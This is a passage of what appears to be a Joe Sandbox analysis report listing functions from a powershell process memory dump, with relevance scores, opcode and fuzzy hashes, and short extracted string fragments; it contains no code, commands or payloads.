                                                • Opcode ID: fee882586855b2bbe317b30e19340187d63e9822fb7aefd0973d34defa975dbe
                                                • Instruction ID: 7eb0dd70e42eba7e4e31b6e1182f56839a0a28503fdc6f7d5866f10e3e9a1117
                                                • Opcode Fuzzy Hash: fee882586855b2bbe317b30e19340187d63e9822fb7aefd0973d34defa975dbe
                                                • Instruction Fuzzy Hash: E4F13435F022158FDBA1AF6988616AABBF2AFC5320F14806ED945CF351DB31C941CBE1
                                                Function 06DEDFA0 Relevance: 12.9, Strings: 10, Instructions: 374COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2773174188.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6de0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (f8l$(f8l$(f8l$(f8l$4'cq$4'cq$4'cq$4'cq$x.)k$-)k
                                                • API String ID: 0-3387728372
                                                • Opcode ID: 27ddaf21d9c837eac8b35277fe2f89802abf7a400eefef8bff183526c34ebbe5
                                                • Instruction ID: cde82c93ed7378763df6be13bf959d9c9a0539fa66ca86e85aff32df83b9b1a5
                                                • Opcode Fuzzy Hash: 27ddaf21d9c837eac8b35277fe2f89802abf7a400eefef8bff183526c34ebbe5
                                                • Instruction Fuzzy Hash: 66E19074F012099FDB64EBA4C451B6EBBB3EF88314F148429E9066F794CB35EC818B91
                                                Function 06DE23E8 Relevance: 12.8, Strings: 10, Instructions: 300COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2773174188.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6de0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'cq$4'cq$4'cq$4'cq$$cq$$cq$$cq$$cq$$cq$$cq
                                                • API String ID: 0-3550717347
                                                • Opcode ID: 83b1723d93b004d9d126f874e3cb7efefac3a35585b09fb1b9b2655cbb9b8e5e
                                                • Instruction ID: 0615577477d88c35ba9ec4bbf037ae2936c027d37c46d3b7e161991b6aaadf92
                                                • Opcode Fuzzy Hash: 83b1723d93b004d9d126f874e3cb7efefac3a35585b09fb1b9b2655cbb9b8e5e
                                                • Instruction Fuzzy Hash: CDA12831B152198FDB65AB28981067B7BFAAFC5350B14807FD985CB291DB31CA81C7E1
                                                Function 06DEE538 Relevance: 11.4, Strings: 9, Instructions: 191COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2773174188.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6de0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (f8l$(f8l$(f8l$(f8l$4'cq$4'cq$45l$45l$tL*k
                                                • API String ID: 0-1388614064
                                                • Opcode ID: eb688e38185d781ecfa05a675492407f7a5665f988a7cad8a87493ccb18c13c2
                                                • Instruction ID: 4d21d5a866236117f02316961b2c7b55ef179855175603e49d31770375077142
                                                • Opcode Fuzzy Hash: eb688e38185d781ecfa05a675492407f7a5665f988a7cad8a87493ccb18c13c2
                                                • Instruction Fuzzy Hash: CE618D74F01205DBDB64EB68C451A6ABBF3AF88310F15852DD5059B345DB35EC82CBA2
                                                Function 06DE4198 Relevance: 10.5, Strings: 8, Instructions: 497COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2773174188.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6de0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'cq$4'cq$$cq$$cq$$cq$$cq$$cq$$cq
                                                • API String ID: 0-1968672451
                                                • Opcode ID: b5fc8a456593c2b171ef6e91139e37ee2c759b55ca7243e5e9bb3db140815b55
                                                • Instruction ID: fe9bdd2ba1670a729980a3ec7143e559af26ff2976d88a3221d67759a5498967
                                                • Opcode Fuzzy Hash: b5fc8a456593c2b171ef6e91139e37ee2c759b55ca7243e5e9bb3db140815b55
                                                • Instruction Fuzzy Hash: DBF14435B043559FDB65AF79C8506ABBBF6AFC9211B2480BBD845CB281DF31C841CBA1
                                                Function 06DE1D58 Relevance: 10.4, Strings: 8, Instructions: 387COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2773174188.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6de0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'cq$4'cq$4'cq$4'cq$t~vq$$cq$$cq$$cq
                                                • API String ID: 0-3735405088
                                                • Opcode ID: 46de0d39c547c88a91fc7a5997f4eb6ecf10ba52236d14d2dbe682dc200fe11b
                                                • Instruction ID: 324a1d60992216832d9a8908d9a184924828201927c01d0017f01e284f211d1e
                                                • Opcode Fuzzy Hash: 46de0d39c547c88a91fc7a5997f4eb6ecf10ba52236d14d2dbe682dc200fe11b
                                                • Instruction Fuzzy Hash: 8CD11635B002198FCBA5AF6988506AFBBF6BFC9310F14847AD545CB241DB31CA55C7E1
                                                Function 06DECF14 Relevance: 10.2, Strings: 8, Instructions: 171COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2773174188.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6de0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'cq$846l$TQhq$TQhq$tPcq$$cq$$cq$$cq
                                                • API String ID: 0-875262410
                                                • Opcode ID: 800c4844036c6bede304fa9d60ed951658dcfa81820af05919677064b3cfcf5c
                                                • Instruction ID: 334ee53160c1b9805ff1d6f3ced27e6d9d8224dfa01723e83aa58258b0da5d09
                                                • Opcode Fuzzy Hash: 800c4844036c6bede304fa9d60ed951658dcfa81820af05919677064b3cfcf5c
                                                • Instruction Fuzzy Hash: 08514830A01204DFEBA5EF45C940BA6B7B3BF81311F5880AAE8549B295CF75DC81CBE1
                                                Function 06DE00F0 Relevance: 9.2, Strings: 7, Instructions: 454COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2773174188.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6de0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'cq$4'cq$XY8l$XY8l$hT(k$tPcq$tPcq
                                                • API String ID: 0-2561121
                                                • Opcode ID: 9c6506fcbffe3c2c75e407c95396a0aec9c7e7d3f4db83f60c7e5dc021c5b81f
                                                • Instruction ID: bc18063e6808d3a659e1599ce240424a6346345a138fa726cb716ed58a65b64a
                                                • Opcode Fuzzy Hash: 9c6506fcbffe3c2c75e407c95396a0aec9c7e7d3f4db83f60c7e5dc021c5b81f
                                                • Instruction Fuzzy Hash: B5E14831B042158FDB61AFA88855A7ABBF6AFC5310F28C07BD545CF291DBB1C861C7A1
                                                Function 06DEC9F7 Relevance: 8.9, Strings: 7, Instructions: 155COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2773174188.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6de0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'cq$846l$d%iq$d%iq$d%iq$tPcq$$cq
                                                • API String ID: 0-3883351080
                                                • Opcode ID: 7168f46e803fa0a58a27dd12a186e8402d117cc3f9f92fb92d18c06a9ed26e77
                                                • Instruction ID: 4ec5a64887951bacfce235cad78b94da887aac5b866b3aee0ed4f21338a78a8d
                                                • Opcode Fuzzy Hash: 7168f46e803fa0a58a27dd12a186e8402d117cc3f9f92fb92d18c06a9ed26e77
                                                • Instruction Fuzzy Hash: A051D231F202099FDBA4EF15C840BAAB7F6BF84754F198069E8259B291D731DC80CBA1
                                                Function 06DEDF99 Relevance: 7.8, Strings: 6, Instructions: 302COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2773174188.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6de0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (f8l$(f8l$4'cq$4'cq$x.)k$-)k
                                                • API String ID: 0-2772284010
                                                • Opcode ID: 2d7bebed79461d040bc0e09980171ae6278b3f759ea4caf5914c44474c93b7f2
                                                • Instruction ID: e261386de1229aaa3e398a5dfb71ec4a5c2ce90c0ab5599bdc8f1830a8107148
                                                • Opcode Fuzzy Hash: 2d7bebed79461d040bc0e09980171ae6278b3f759ea4caf5914c44474c93b7f2
                                                • Instruction Fuzzy Hash: 68C17C34E01209DFDB64EBA4C451B6EBBB2EF88314F148419E8066B795CB75EC86CF91
                                                Function 06DECB26 Relevance: 7.6, Strings: 6, Instructions: 85COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2773174188.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6de0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'cq$846l$d%iq$d%iq$d%iq$tPcq
                                                • API String ID: 0-3409884324
                                                • Opcode ID: 1dc59333ab82f6d8f3426df73dc580e4db4b936223b8bb6794183755ca40c979
                                                • Instruction ID: 215af653ba078e818c73456170846cd4858f297effa2ecfe7d2bb423f1e48e3f
                                                • Opcode Fuzzy Hash: 1dc59333ab82f6d8f3426df73dc580e4db4b936223b8bb6794183755ca40c979
                                                • Instruction Fuzzy Hash: 0E31B135F10218DFD764EF59C445AAABBF2FB88750F158159E829AB381C731EC41CB91
                                                Function 06DED6AD Relevance: 6.4, Strings: 5, Instructions: 194COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2773174188.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6de0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 846l$846l$tPcq$tPcq$$cq
                                                • API String ID: 0-1629349814
                                                • Opcode ID: 08313ae58c199eec0c85283e183c1baef89e0b379abd530eedd376f9dc975e0e
                                                • Instruction ID: 8487f92814df763ca572d2585bcc02105112b0a5790db001b90f516ade374ad6
                                                • Opcode Fuzzy Hash: 08313ae58c199eec0c85283e183c1baef89e0b379abd530eedd376f9dc975e0e
                                                • Instruction Fuzzy Hash: FD61C235F001099FDB55BB698441AAABBF3AF88710F25C06AE9469F381CF31DC41CBA1
                                                Function 06DEE533 Relevance: 6.4, Strings: 5, Instructions: 158COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2773174188.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6de0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (f8l$(f8l$4'cq$45l$tL*k
                                                • API String ID: 0-2984634946
                                                • Opcode ID: 6c8b1511de4c1e02bbe00c42b7452b2b427b227811e715bfd3383417ff69e1b1
                                                • Instruction ID: 5da7ff4b6b0c1718d8e80752a45a6878124502ed45f7e0e9f5e41877c54d0186
                                                • Opcode Fuzzy Hash: 6c8b1511de4c1e02bbe00c42b7452b2b427b227811e715bfd3383417ff69e1b1
                                                • Instruction Fuzzy Hash: 4A518E74E01205DFDB64EB58C491E6ABBF2AF88310F18852DD515AB351DB36EC82CF91
                                                Function 06DEB098 Relevance: 6.3, Strings: 5, Instructions: 71COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2773174188.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6de0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $cq$$cq$$cq$.l$.l
                                                • API String ID: 0-2474895147
                                                • Opcode ID: 9f15305ae312d02a206398314fb40665d5758278f9c5d3b377a288d2e31e0d87
                                                • Instruction ID: ae5fc53c596c22fd94f8a7cef31e575c9a25df0486ecd3135e37563cf36b0943
                                                • Opcode Fuzzy Hash: 9f15305ae312d02a206398314fb40665d5758278f9c5d3b377a288d2e31e0d87
                                                • Instruction Fuzzy Hash: 8D11E6317042199BEF747A6ADA14727B7A6ABC5320F24C02FE89987391CA71F841C791
                                                Function 06DEC290 Relevance: 5.5, Strings: 4, Instructions: 476COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2773174188.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6de0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (ocq$(ocq$(ocq$(ocq
                                                • API String ID: 0-2003149739
                                                • Opcode ID: b7f146abe204db8463954922ad6fc91d13b6a91a3801f3443f656b8832dda894
                                                • Instruction ID: 5fcf46bfd348f755418e0f8efd240cb20f5e7721f81a4cd3045c61cab3b52389
                                                • Opcode Fuzzy Hash: b7f146abe204db8463954922ad6fc91d13b6a91a3801f3443f656b8832dda894
                                                • Instruction Fuzzy Hash: B6F13631B14209CFDB65AF68C854B7ABBB2FF89310F14846EE4658B291DB31D851CBA1
                                                Function 06DE4B68 Relevance: 5.3, Strings: 4, Instructions: 273COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2773174188.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6de0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 846l$846l$tPcq$tPcq
                                                • API String ID: 0-1931893279
                                                • Opcode ID: f9cce2ce751847a8751a79d883822b29bb1909eb9082933f437ea3dedd2cb8ec
                                                • Instruction ID: 5fd3d7abbf06512b9290d8553515bf0f5789fd5049246f238efceb4a84dccd3d
                                                • Opcode Fuzzy Hash: f9cce2ce751847a8751a79d883822b29bb1909eb9082933f437ea3dedd2cb8ec
                                                • Instruction Fuzzy Hash: 33912535F002459FCBA4AF698890B6BBBE6AFC4311F28846AD945DB381CF31D840C7A1
                                                Function 06DE7B48 Relevance: 5.2, Strings: 4, Instructions: 192COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2773174188.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6de0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (f8l$(f8l$(f8l$(f8l
                                                • API String ID: 0-2227517150
                                                • Opcode ID: 6d5da6f0e32d9dba7eb69b32679f8958133c74830fe76b6aa51cf4fb15cc15e2
                                                • Instruction ID: fe3175caa2ab725a5f6b3db6c3d4bab45c0d64f31f4aaeee4f91fb22018c7c18
                                                • Opcode Fuzzy Hash: 6d5da6f0e32d9dba7eb69b32679f8958133c74830fe76b6aa51cf4fb15cc15e2
                                                • Instruction Fuzzy Hash: CC716974F01109DFDBA4EB68C451AAABBB6EF88310F158169D905AF355CB32EC81CF91
                                                Function 06DE1BB8 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2773174188.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6de0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $cq$$cq$$cq$$cq
                                                • API String ID: 0-2876200767
                                                • Opcode ID: 5d948015db286a02757ed82f4c9f14da2ee1cada1db828bff10e7b597839feaa
                                                • Instruction ID: eaf2053e95c3022a995934be3b848f986029cde2c735f6e52e4a64f89fe2663c
                                                • Opcode Fuzzy Hash: 5d948015db286a02757ed82f4c9f14da2ee1cada1db828bff10e7b597839feaa
                                                • Instruction Fuzzy Hash: 45212735B002195BEBB47A3A9C4172BF7EA9BC5721F64843AA949CB381DD75C841C3A1
                                                Function 06DE1A38 Relevance: 5.0, Strings: 4, Instructions: 50COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2773174188.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6de0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'cq$4'cq$$cq$$cq
                                                • API String ID: 0-1126079151
                                                • Opcode ID: 9cf37f560ed9ff008864fa644fc5194af5d9d297a6ae75b3f43e97dc7f08ab5d
                                                • Instruction ID: f5358565c2bfa01136670b2bb8d3f98420625dd8c205df73469e7b85e76f0dfe
                                                • Opcode Fuzzy Hash: 9cf37f560ed9ff008864fa644fc5194af5d9d297a6ae75b3f43e97dc7f08ab5d
                                                • Instruction Fuzzy Hash: 8B01A210B1A3964FC3672B782C205776FB69FC361036A01DBD081DF297C9298D4A83E7